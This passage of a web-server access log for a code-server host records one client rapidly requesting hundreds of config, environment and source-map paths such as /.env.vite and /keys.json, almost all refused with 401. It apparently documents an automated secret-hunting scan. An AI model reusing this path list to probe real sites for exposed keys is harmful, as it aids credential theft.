-] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/build/main.js" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/_next/static/chunks/webpack.js.map" [Client 216.81.248.16] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/js/config.js" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/api/config" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/public/js/bundle.js" [Client 216.81.248.16] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/public/build/root.js" [Client 216.81.248.16] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/runtime.js.map" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/_nuxt/app.js" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/dist/.vite/manifest.json" [Client 216.81.248.16] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/config/env.js" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/_next/static/chunks/0.js" [Client 216.81.248.16] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/_next/static/chunks/commons.js" [Client 216.81.248.16] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/assets/index.js" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/dist/app.js" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/public/build/manifest.json" [Client 216.81.248.16] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/runtime~main.js" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/build/main.js.map" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/_nuxt/vendors.app.js.map" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/dist/main.js" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/_app/immutable/entry/app.js" [Client 216.81.248.16] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/_astro/client.js" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/src/env.d.ts" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/build/qwik-loader.js" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/config.json" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/_next/static/chunks/framework.js" [Client 216.81.248.16] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/static/js/main.js.map" [Client 216.81.248.16] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/page-data/app-data.json" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/.env.vite" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/static/js/bundle.js.map" [Client 216.81.248.16] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/.cache/page-ssr/routes/render-page.js" [Client 216.81.248.16] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/env-config.js" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/static/js/3.chunk.js" [Client 216.81.248.16] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/payment.js" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/assets/js/app.js" [Client 216.81.248.16] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/public/js/main.js" [Client 216.81.248.16] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/public/js/app.js" [Client 216.81.248.16] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/donate" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/astro.config.mjs" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/keys.json" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/serviceworker.js" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/api/config.json" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/cart" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/asset-manifest.json" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 216.81.248.16] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/build/asset-manifest.json" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/src/env.js" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/checkout" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/static/js/2.chunk.js" [Client 216.81.248.16] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/service-worker.js" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/api.js" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/build/app.js" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/vendor.js" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/config.js" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/workbox.js" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/_next/static/chunks/polyfills.js" [Client 216.81.248.16] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/static/js/runtime-main.js" [Client 216.81.248.16] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/dist/bundle.js" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/__config.js" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/runtime.js" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/stripe.js" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/app.js" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/_app/env.js" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/.svelte-kit/output/client/_app/env.js" [Client 216.81.248.16] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/settings.js" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/_next/static/chunks/pages/index.js" [Client 216.81.248.16] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/.astro/types.d.ts" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/assets/index.js.map" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/__ENV.js" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/.vite/deps/_metadata.json" [Client 216.81.248.16] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/dist/bundle.js.map" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/dist/main.js.map" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/build/q-manifest.json" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/build/root.js" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/dist/solid.js" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/_next/static/chunks/webpack.js" [Client 216.81.248.16] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/_next/static/chunks/main.js" [Client 216.81.248.16] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/@vite/client" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/assets/vendor.js" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/dist/client.js" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/assets/main.js.map" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/_astro/hoisted.js" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/js/main.js.map" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/build/bundle.js.map" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/_astro/page.js" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/public/page-data/app-data.json" [Client 216.81.248.16] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/config/keys.js" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/dist/app.js.map" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/runtime-config.js" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/assets/main.js" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/_next/static/chunks/main.js.map" [Client 216.81.248.16] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/webpack.runtime.js" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/remix.config.js" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/index.html" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/_next/static/development/pages/_app.js" [Client 216.81.248.16] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/env.js" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/constants.js" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/build/static/js/main.js" [Client 216.81.248.16] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/static/js/main.js" [Client 216.81.248.16] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/static/js/app.js" [Client 216.81.248.16] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/build/bundle.js" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/assets/js/main.js" [Client 216.81.248.16] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/checkout.js" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/js/main.js" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/main.js.map" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/bundle.js.map" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/vendor.js.map" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/build/static/js/main.js.map" [Client 216.81.248.16] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/static/js/main.chunk.js.map" [Client 216.81.248.16] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/js/app.js.map" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/_next/static/chunks/pages/_app.js.map" [Client 216.81.248.16] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/_nuxt/app.js.map" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/_next/static/chunks/pages/_app.js" [Client 216.81.248.16] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/_nuxt/config.js" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/_nuxt/vendors.app.js" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/static/js/main.chunk.js" [Client 216.81.248.16] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/config/index.js" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; 